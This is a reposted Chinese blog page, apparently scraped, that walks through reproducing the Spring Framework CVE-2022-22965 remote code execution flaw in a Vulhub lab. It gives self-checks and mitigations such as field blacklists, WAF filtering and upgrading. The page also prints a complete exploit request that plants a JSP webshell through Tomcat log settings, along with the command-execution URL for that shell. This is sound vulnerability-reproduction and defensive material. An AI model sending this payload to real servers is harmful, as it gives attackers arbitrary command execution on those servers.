当前位置: 首页 > news >正文

电子商务网站建设规划书网站模拟效果

电子商务网站建设规划书,网站模拟效果,简单的网站后台管理系统,展示设计案例CVE-2022-22965#xff1a;Spring Framework远程代码执行漏洞 本文仅为验证漏洞#xff0c;在本地环境测试验证#xff0c;无其它目的 漏洞编号#xff1a; CVE-2022-22965 漏洞说明#xff1a; Spring framework 是Spring 里面的一个基础开源框架#xff0c;其目的是…CVE-2022-22965Spring Framework远程代码执行漏洞 本文仅为验证漏洞在本地环境测试验证无其它目的 漏洞编号 CVE-2022-22965 漏洞说明 Spring framework 是Spring 里面的一个基础开源框架其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日VMware Tanzu发布漏洞报告Spring Framework存在远程代码执行漏洞在 JDK 9 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行 (RCE) 的攻击。 漏洞影响范围 Spring Framework 5.3.18Spring Framework 5.2.20 漏洞级别 高危 漏洞复现 本次复现采用Vulhub靶场环境需要在本地搭建Vulhub靶场自行百度如有问题可以沟通交流后期时间充足可以再出Vulhub搭建教程需注意将请求中的代码更换为靶机所在IP 参考Vulhub/CVE-2022-22965 进入靶场环境【Vulhub}-【Spring】-【CVE-2022-22965】使用以下命令启动环境 docker-compose up -d根据VULHUB靶场提示操作访问靶场服务器IP端口 bash http://192.168.32.132:8080/?nameBobage25 此处要注意因为靶场会占用8080端口所以当BP和靶场在统一环境下时注意修改BP的8080端口为其他并在浏览器中进行更新才能访问靶场环境 发送以下请求以更改 Apache Tomcat 中的日志记录配置并将日志写入 JSP 文件 GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Diclass.module.classLoader.resources.context.parent.pipeline.first.suffix.jspclass.module.classLoader.resources.context.parent.pipeline.first.directorywebapps/ROOTclass.module.classLoader.resources.context.parent.pipeline.first.prefixtomcatwarclass.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat HTTP/1.1 Host: 192.168.32.132:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close suffix: %// c1: Runtime c2: % DNT: 1然后访问刚才的 JSP webshell并执行任意命令 bash http://192.168.32.132:8080/tomcatwar.jsp?pwdjcmdid 漏洞自查 参考安恒信息CERT 临时解决方案 排查是否使用了Spring框架包括但不限于以下方法 (1)排查项目中是否使用了Spring框架 可遍历项目文件查找是否包含spring-beans-.jar (2)排查war包中是否存在Spring框架 检查war包内是否存在spring-beans-.jar文件若存在则表示使用spring开发框架若不存在则进一步确认是否存在CachedIntrospectionResults.class文件若存在则表示使用Spring开发框架或衍生框架。 (3)排查jar包部中的Spring 检查Jar包内是否存在spring-beans-*.jar文件若存在则表示使用Spring开发框架若不存在则进一步确认是否存在CachedIntrospectionResults.class文件若存在则表示使用Spring开发框架或衍生框架。 在使用Spring框架的服务器中命令行下执行“java –version”查看当前JDK版本如果JDK版本在8及以下则不受此漏洞影响 漏洞修复 参考 深信服千里目安全实验室 临时解决方案 在应用中全局搜索InitBinder注解看看方法体内是否调用dataBinder.setDisallowedFields方法如果发现此代码片段的引入,则在原来的黑名单中添加{“class.,Class.”,“.class.”,“.Class.”}。(注:如果此代码片段使用较多需要每个地方都追加)在应用系统的项目包下新建以下全局类并保证这个类被Spring 加载到(推荐在Controller所在的包中添加)。完成类添加后需对项目进行重新编译打包和功能验证测试并重新发布项目 WAF等安全组件防护 在WAF等网络防护设备上根据实际部署业务的流量情况实现对“class.”“Class.”“.class.”“.Class.”等字符串的规则过滤并在部署过滤规则后对业务运行情况进行测试避免产生额外影响。 官方修复 当前 Spring Framework 官方已发布最新版本建议受影响的用户及时更新升级到最新版本。链接如下 https://github.com/spring-projects/spring-framework/tags 注Spring Framework 5.3.18和Spring Framework 5.2.20是 Spring 官方提供的两个安全版本截止至3月31日
http://www.zqtcl.cn/news/494371/

相关文章:

  • 电商网站开发过程是什么推广整合营销
  • 网页建站软件网络市场调研的步骤
  • 自己做的网站怎样赚钱长沙专业做网站排名
  • 张家界做网站公司国内最先做弹幕的网站
  • 免费快速建站网站做网站用什么数据库
  • 哪有做课件赚钱的网站温州设计公司排名
  • 西安网站建设公司php大气企业网站
  • 天河公司网站建设内蒙古建设厅安全资料网站
  • 学习网站的建设怎么做网站建设作业
  • 做公司产品展示网站企业网盘源码
  • 南通做网站企业初中生代表性设计制作作品图片
  • php框架做网站好处网站后台模板免费下载
  • 新兴县建设局网站建筑工程网络计划技术
  • 住房和城乡建设部网站北京网站建设设计规划
  • 哪个网站做logo设计师网络营销心得体会800字
  • 广州一起做的网站动态数据库网站
  • 网站程序预装深圳市住房和建设局陈斌
  • 网站建设历程wordpress国内主题排行
  • 公司网站建设及优化计划书找能做网站的
  • 网站建设方案模板下载南宁有名的网络公司
  • 本地做织梦网站做软件怎么赚钱
  • a站全称重庆大学网络教育平台
  • 美橙做过网站案例好文案网站
  • 鞍山商城网站建设国外代理ip
  • 东莞网站设计风格wordpress不能启动怎么解决
  • 社交网站制作临海建设局网站导航
  • 合肥需要做网站的公司佛山网站制作的公司
  • 哪里有做网站平台建设网站如何盈利
  • dw网站制作素材单人做网站需要掌握哪些知识
  • 网络推广产品公司做移动网站优化首